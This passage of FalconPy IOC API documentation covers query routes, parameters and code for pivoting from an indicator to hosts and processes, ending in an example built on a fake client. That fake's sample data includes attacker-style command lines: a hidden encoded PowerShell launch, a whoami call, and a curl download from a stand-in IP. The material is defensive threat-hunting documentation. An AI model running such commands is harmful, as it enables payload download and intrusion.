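    """Yield indicator records one at a time across every page.

    Only `after` is ever sent (never `offset`): the two are mutually exclusive
    and offset cannot reach past the first 10k results. A page cap bounds the
    loop so a token that never advances cannot spin forever.
    """
    after = None
    for _ in range(max_pages):
        kwargs = {"limit": limit, "sort": sort}
        if fql_filter:
            kwargs["filter"] = fql_filter
        if after:
            kwargs["after"] = after
        response = falcon.indicator_combined(**kwargs)
        if response.get("status_code") != 200:
            raise RuntimeError(f"indicator_combined returned {response.get('status_code')}: "
                               f"{response.get('body', {}).get('errors')}")
        body = response.get("body", {})
        resources = body.get("resources") or []
        yield from resources
        next_after = (body.get("meta", {}).get("pagination") or {}).get("after")
        if not next_after or not resources or next_after == after:
            return
        after = next_after
    raise RuntimeError("pagination did not terminate within max_pages")


def collect_indicators(falcon, **kwargs) -> Dict[str, dict]:
    """Materialise the walk as {indicator id: record}; duplicate ids collapse."""
    return {rec["id"]: rec for rec in iter_indicators(falcon, **kwargs)}


class FakeIOC:
    """Constructed stand-in: five records served in pages, driven by after tokens."""

    def __init__(self):
        self.records = [{"id": f"ioc-{i}", "type": "domain", "value": f"host{i}.example"}
                        for i in range(5)]
        self.calls = []

    def indicator_combined(self, **kwargs):
        self.calls.append(dict(kwargs))
        assert "offset" not in kwargs, "after and offset are mutually exclusive"
        start = int(kwargs["after"]) if kwargs.get("after") else 0
        limit = kwargs["limit"]
        page = self.records[start:start + limit]
        meta = {"pagination": {"total": len(self.records), "limit": limit}}
        if start + limit < len(self.records):
            meta["pagination"]["after"] = str(start + limit)
        return {"status_code": 200, "headers": {}, "body": {"meta": meta, "resources": page}}


if __name__ == "__main__":
    client = FakeIOC()
    found = collect_indicators(client, limit=2)
    print(len(found), "indicators over", len(client.calls), "requests")
```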
Back to Table of Contents
Query IOC Types.
ioc_type_query

Method | Route |
---|---|
| | /iocs/queries/ioc-types/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | string | The offset to start retrieving records from. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.ioc_type_query(offset="string", limit=integer)
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.ioc_type_query_v1(offset="string", limit=integer)
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("ioc_type_query_v1", offset="string", limit=integer)
print(response)
```
Back to Table of Contents
Query Platforms.
platform_query

Method | Route |
---|---|
| | /iocs/queries/platforms/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | string | The offset to start retrieving records from. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.platform_query(offset="string", limit=integer)
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.platform_query_v1(offset="string", limit=integer)
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("platform_query_v1", offset="string", limit=integer)
print(response)
```
Back to Table of Contents
Query Severities.
severity_query

Method | Route |
---|---|
| | /iocs/queries/severities/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
limit | | | query | integer | Maximum number of results to return. |
offset | | | query | string | The offset to start retrieving records from. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy.ioc import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.severity_query(offset="string", limit=integer)
print(response)
```

```python
from falconpy import IOC

falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.severity_query_v1(offset="string", limit=integer)
print(response)
```

```python
from falconpy import APIHarnessV2

falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("severity_query_v1", offset="string", limit=integer)
print(response)
```
Back to Table of Contents
Number of hosts in your customer account that have observed a given custom IOC
This operation has been superseded by the indicator_get_device_count_v1 operation.
devices_count_legacy

Method | Route |
---|---|
| | /indicators/aggregates/devices-count/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | | | query | string | The type of the indicator. Valid types include: |
value | | | query | string | The string representation of the indicator. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.devices_count_legacy(type="string", value="string")
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.DevicesCount(type="string", value="string")
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("DevicesCount", type="string", value="string")
print(response)
```
Back to Table of Contents
Number of hosts in your customer account that have observed a given custom IOC
devices_count (or indicator_get_device_count_v1)

Method | Route |
---|---|
| | /iocs/aggregates/indicators/device-count/v1 |

- Consumes: application/json
- Produces: application/json

Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | | | query | string | The type of the indicator. Valid types include: |
value | | | query | string | The string representation of the indicator. |
parameters | | | query | dictionary | Full query string parameters payload in JSON format. |

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.devices_count(type="string", value="string")
print(response)
```

```python
from falconpy import IOC

# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )

response = falcon.indicator_get_device_count_v1(type="string", value="string")
print(response)
```

```python
from falconpy import APIHarnessV2

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )

response = falcon.command("indicator_get_device_count_v1", type="string", value="string")
print(response)
```
Find hosts that have observed a given custom IOC.
This operation has been superseded by the indicator_get_devices_ran_on_v1 operation.
devices_ran_on_legacy
Method | Route |
---|---|
GET | /indicators/queries/devices/v1 |
- Consumes: application/json
- Produces: application/json
Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | ✓ | ✓ | query | string | The type of the indicator. Valid types include: |
value | ✓ | ✓ | query | string | The string representation of the indicator. |
limit | ✓ | ✓ | query | integer | Maximum number of results to return. |
offset | ✓ | ✓ | query | integer | Starting offset to begin returning results. |
parameters | ✓ | ✓ | query | dictionary | Full query string parameters payload in JSON format. |
```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
# limit and offset are integers, not strings
response = falcon.devices_ran_on_legacy(type="string",
                                        value="string",
                                        limit=integer,
                                        offset=integer
                                        )
print(response)
```

```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
response = falcon.DevicesRanOn(type="string",
                               value="string",
                               limit=integer,
                               offset=integer
                               )
print(response)
```

```python
from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )
response = falcon.command("DevicesRanOn",
                          type="string",
                          value="string",
                          limit=integer,
                          offset=integer
                          )
print(response)
```
Find hosts that have observed a given custom IOC.
devices_ran_on (or indicator_get_devices_ran_on_v1)
Method | Route |
---|---|
GET | /iocs/queries/indicators/devices/v1 |
- Consumes: application/json
- Produces: application/json
Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | ✓ | ✓ | query | string | The type of the indicator. Valid types include: |
value | ✓ | ✓ | query | string | The string representation of the indicator. |
limit | ✓ | ✓ | query | integer | Maximum number of results to return. |
offset | ✓ | ✓ | query | integer | Starting offset to begin returning results. |
parameters | ✓ | ✓ | query | dictionary | Full query string parameters payload in JSON format. |
```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
# limit and offset are integers, not strings
response = falcon.devices_ran_on(type="string",
                                 value="string",
                                 limit=integer,
                                 offset=integer
                                 )
print(response)
```

```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
# Operation ID syntax: this is the devices_ran_on operation,
# not indicator_get_device_count_v1 (which only returns a count)
response = falcon.indicator_get_devices_ran_on_v1(type="string",
                                                  value="string",
                                                  limit=integer,
                                                  offset=integer
                                                  )
print(response)
```

```python
from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )
response = falcon.command("indicator_get_devices_ran_on_v1",
                          type="string",
                          value="string",
                          limit=integer,
                          offset=integer
                          )
print(response)
```
Search for processes associated with a custom IOC
This operation has been superseded by the indicator_get_processes_ran_on_v1 operation.
processes_ran_on_legacy
Method | Route |
---|---|
GET | /indicators/queries/processes/v1 |
- Consumes: application/json
- Produces: application/json
Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | ✓ | ✓ | query | string | The type of the indicator. Valid types include: |
value | ✓ | ✓ | query | string | The string representation of the indicator. |
device_id | ✓ | ✓ | query | string | Specify a Host AID to return only processes from that host. |
limit | ✓ | ✓ | query | integer | Maximum number of results to return. |
offset | ✓ | ✓ | query | integer | Starting offset to begin returning results. |
parameters | ✓ | ✓ | query | dictionary | Full query string parameters payload in JSON format. |
```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
# limit and offset are integers, not strings
response = falcon.processes_ran_on_legacy(type="string",
                                          value="string",
                                          device_id="string",
                                          limit=integer,
                                          offset=integer
                                          )
print(response)
```

```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
response = falcon.ProcessesRanOn(type="string",
                                 value="string",
                                 device_id="string",
                                 limit=integer,
                                 offset=integer
                                 )
print(response)
```

```python
from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )
response = falcon.command("ProcessesRanOn",
                          type="string",
                          value="string",
                          device_id="string",
                          limit=integer,
                          offset=integer
                          )
print(response)
```
Search for processes associated with a custom IOC
processes_ran_on (or indicator_get_processes_ran_on_v1)
Method | Route |
---|---|
GET | /iocs/queries/indicators/processes/v1 |
- Consumes: application/json
- Produces: application/json
Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
type | ✓ | ✓ | query | string | The type of the indicator. Valid types include: |
value | ✓ | ✓ | query | string | The string representation of the indicator. |
device_id | ✓ | ✓ | query | string | Specify a Host AID to return only processes from that host. |
limit | ✓ | ✓ | query | integer | Maximum number of results to return. |
offset | ✓ | ✓ | query | integer | Starting offset to begin returning results. |
parameters | ✓ | ✓ | query | dictionary | Full query string parameters payload in JSON format. |
```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
# limit and offset are integers, not strings
response = falcon.processes_ran_on(type="string",
                                   value="string",
                                   device_id="string",
                                   limit=integer,
                                   offset=integer
                                   )
print(response)
```

```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
response = falcon.indicator_get_processes_ran_on_v1(type="string",
                                                    value="string",
                                                    device_id="string",
                                                    limit=integer,
                                                    offset=integer
                                                    )
print(response)
```

```python
from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )
response = falcon.command("indicator_get_processes_ran_on_v1",
                          type="string",
                          value="string",
                          device_id="string",
                          limit=integer,
                          offset=integer
                          )
print(response)
```
For the provided ProcessID retrieve the process details
entities_processes
Method | Route |
---|---|
GET | /processes/entities/processes/v1 |
- Produces: application/json
Name | Service | Uber | Type | Data type | Description |
---|---|---|---|---|---|
ids | ✓ | ✓ | query | string or list of strings | ProcessID for the running process you want to lookup. |
parameters | ✓ | ✓ | query | dictionary | Full query string parameters payload in JSON format. |
```python
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
             client_secret=CLIENT_SECRET
             )
id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.entities_processes(ids=id_list)
print(response)
```
```python
from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                      client_secret=CLIENT_SECRET
                      )
id_list = 'ID1,ID2,ID3'  # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.command("entities_processes", ids=id_list)
print(response)
```
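The devices_count, devices_ran_on, processes_ran_on and entities_processes operations above are normally used together: count the hosts that observed an indicator, page through their AIDs with limit/offset, narrow processes_ran_on to each host with device_id, and resolve the returned process IDs with entities_processes. The following is an added example written for this page and is not FalconPy's own code. It takes any object exposing those four method names, so a real `falconpy.IOC` instance can be passed where `FakeIOC` is used; `FakeIOC` is a constructed stand-in with made-up host AIDs, process IDs, command lines and a `KNOWN_TYPES` set so the example runs offline. The field names it reads from the bodies (`device_count`, `limit_exceeded`, `meta.pagination.total`, `file_name`, `command_line`) are assumptions about the live service's response shape, which is why the code reads them defensively and checks `status_code` before touching the body.

```python
"""Pivot from one custom IOC to the hosts that saw it and the processes involved.

Added example, not FalconPy's own code. FakeIOC and every value inside it are
constructed; the response field names are assumptions about the live service.
"""
from typing import Any, Callable, Dict, List

PAGE_SIZE = 2  # deliberately tiny so the constructed data needs several pages
# SHA-256 of an empty input: a syntactically valid placeholder, not a real indicator
SAMPLE_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"


def _check(response: Dict[str, Any], what: str) -> Dict[str, Any]:
    """Return the body of a FalconPy-style response, raising on any non-2xx status."""
    status = response.get("status_code", 0)
    if not 200 <= status < 300:
        errors = response.get("body", {}).get("errors", [])
        raise RuntimeError(f"{what} failed with HTTP {status}: {errors}")
    return response.get("body", {})


def _page(call: Callable[..., Dict[str, Any]], what: str, **kwargs: Any) -> List[str]:
    """Collect every resource ID from a limit/offset query operation.

    Stops when meta.pagination.total is reached or a page comes back empty,
    so a short final page or a missing meta block cannot loop forever.
    """
    ids: List[str] = []
    offset = 0
    while True:
        body = _check(call(limit=PAGE_SIZE, offset=offset, **kwargs), what)
        page = list(body.get("resources", []))
        ids.extend(page)
        offset += len(page)
        total = body.get("meta", {}).get("pagination", {}).get("total", offset)
        if not page or offset >= total:
            return ids


def pivot_ioc(falcon: Any, ioc_type: str, ioc_value: str) -> Dict[str, Any]:
    """Return the device count, the host AIDs and per-host process details for an IOC."""
    summary = _check(falcon.devices_count(type=ioc_type, value=ioc_value),
                     "devices_count")["resources"][0]
    hosts = _page(falcon.devices_ran_on, "devices_ran_on", type=ioc_type, value=ioc_value)
    processes: Dict[str, List[Dict[str, Any]]] = {}
    for aid in hosts:
        # device_id narrows processes_ran_on to a single host, as the parameter table documents
        pids = _page(falcon.processes_ran_on, "processes_ran_on",
                     type=ioc_type, value=ioc_value, device_id=aid)
        # entities_processes accepts a list of IDs; skip the call when there is nothing to look up
        processes[aid] = (_check(falcon.entities_processes(ids=pids),
                                 "entities_processes")["resources"] if pids else [])
    return {"device_count": summary.get("device_count", len(hosts)),
            "limit_exceeded": summary.get("limit_exceeded", False),
            "hosts": hosts,
            "processes": processes}


class FakeIOC:
    """Constructed stand-in for falconpy.IOC; every value below is made up."""
    KNOWN_TYPES = {"sha256", "md5", "domain", "ipv4", "ipv6"}  # assumption for the fake only
    HOSTS = ["aid-host-1", "aid-host-2", "aid-host-3"]
    # process IDs use an assumed pid:<aid>:<pid> form; constructed for the fake
    PROCS = {"aid-host-1": ["pid:aid-host-1:4100", "pid:aid-host-1:4188"],
             "aid-host-2": ["pid:aid-host-2:910"],
             "aid-host-3": []}
    DETAILS = {"pid:aid-host-1:4100": {"file_name": "powershell.exe",
                                       "command_line": "powershell.exe -nop -w hidden -enc ..."},
               "pid:aid-host-1:4188": {"file_name": "cmd.exe", "command_line": "cmd.exe /c whoami"},
               "pid:aid-host-2:910": {"file_name": "curl",
                                      "command_line": "curl -O http://203.0.113.7/x"}}

    @staticmethod
    def _ok(body: Dict[str, Any]) -> Dict[str, Any]:
        return {"status_code": 200, "headers": {}, "body": body}

    def devices_count(self, type, value, **_):
        if type not in self.KNOWN_TYPES:  # mimic an HTTP 400 so the error path is exercised
            return {"status_code": 400, "headers": {},
                    "body": {"errors": [{"code": 400, "message": f"invalid type {type!r}"}]}}
        return self._ok({"resources": [{"type": type, "value": value,
                                         "device_count": len(self.HOSTS), "limit_exceeded": False}]})

    def devices_ran_on(self, type, value, limit, offset, **_):
        return self._ok({"resources": self.HOSTS[offset:offset + limit],
                         "meta": {"pagination": {"total": len(self.HOSTS), "limit": limit, "offset": offset}}})

    def processes_ran_on(self, type, value, device_id, limit, offset, **_):
        procs = self.PROCS.get(device_id, [])
        return self._ok({"resources": procs[offset:offset + limit],
                         "meta": {"pagination": {"total": len(procs), "limit": limit, "offset": offset}}})

    def entities_processes(self, ids, **_):
        wanted = ids.split(",") if isinstance(ids, str) else ids
        return self._ok({"resources": [{"process_id": p, **self.DETAILS[p]}
                                       for p in wanted if p in self.DETAILS]})


if __name__ == "__main__":
    result = pivot_ioc(FakeIOC(), "sha256", SAMPLE_SHA256)
    print(f"{result['device_count']} host(s) observed the IOC")
    for aid, procs in result["processes"].items():
        for proc in procs:
            print(f"  {aid}: {proc['process_id']} {proc['command_line']}")
```

With a live client, replace `FakeIOC()` with `IOC(client_id=..., client_secret=...)` and keep the `status_code` check: a 401/403 from a scope-limited API key otherwise comes back with an empty `resources` list and looks like "no hosts observed this IOC".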